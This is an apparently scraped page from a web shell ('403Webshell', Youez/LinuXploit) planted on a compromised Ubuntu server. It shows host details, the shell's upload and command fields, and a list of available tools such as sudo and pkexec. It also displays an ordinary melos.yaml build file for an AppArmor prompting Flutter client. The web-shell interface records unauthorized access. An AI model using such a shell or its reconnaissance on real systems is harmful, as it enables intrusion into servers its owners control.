403Webshell
Server IP : 104.21.84.107  /  Your IP : 104.23.243.196
Web Server : Apache/2.4.63 (Ubuntu)
System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.4.5
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /snap/prompting-client/104/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /snap/prompting-client/104/melos.yaml
name: apparmor_prompting
sdkPath: .fvm/flutter_sdk

packages:
  - flutter/apps/**
  - flutter/packages/**

command:
  bootstrap:
    environment:
      sdk: ">=3.3.3 <4.0.0"
      flutter: ">=3.19.6"

    dev_dependencies:
      ubuntu_lints: ^0.4.0

scripts:
  # build all packages
  build: >
    melos exec -c 1 --fail-fast --flutter --dir-exists=linux -- \
      fvm flutter build linux

  # collect coverage information for all packages
  coverage: >
    melos exec -c 1 --fail-fast --dir-exists=test -- \
      fvm flutter test --coverage && melos run coverage:cleanup

  # cleanup generated files from coverage
  coverage:cleanup: >
    melos exec --file-exists=coverage/lcov.info -- \
      lcov --remove coverage/lcov.info \
        '**/*.freezed.dart' \
        '**/*.g.dart' \
        '**/*.mocks.dart' \
        '**/l10n/*.dart' \
        '**/*.pb*.dart' \
        --ignore-errors unused,unused \
        -o coverage/lcov.info

  # format all packages
  format:exclude: >
    find . -name '*.dart' \
      ! -name '*.freezed.dart' \
      ! -name '*.g.dart' \
      ! -name '*.mocks.dart' \
      ! -path '*/l10n/*.dart' \
      ! -name '*.pb*.dart' \
      ! -path '*/.*/*' \
      | xargs fvm dart format --set-exit-if-changed

  # run build_runner to generate code in all packages
  generate: >
    dart pub global run melos exec -c 1 --fail-fast --depends-on=build_runner -- \
      fvm dart run build_runner build --delete-conflicting-outputs

  # run build_runner in the background to watch for changes in all packages
  generate-watch: >
    melos exec -c 1 --depends-on=build_runner -- \
      fvm dart run build_runner watch -d &

  # run gen-l10n to generate localizations in all packages
  gen-l10n: >
    melos exec -c 1 --fail-fast --depends-on=flutter_localizations -- \
     fvm flutter gen-l10n

  # run integration tests in all packages
  integration_test: >
    melos exec -c 1 --fail-fast --dir-exists=integration_test -- \
      fvm flutter test integration_test

  # runs "flutter pub <arg(s)>" in all packages
  pub: melos exec -c 1 -- fvm flutter pub "$@"

  # run tests in all packages
  test: >
    melos exec -c 1 --fail-fast --dir-exists=test -- \
      fvm flutter test

  # generate protobuf files in prompting_client
  protoc:
    run: |
      rm -rf ./flutter/packages/prompting_client/lib/src/generated/* &&
      protoc --dart_out=grpc:./flutter/packages/prompting_client/lib/src/generated \
        -Iprotos protos/*.proto google/protobuf/empty.proto google/protobuf/wrappers.proto

Youez - 2016 - github.com/yon3zu
LinuXploit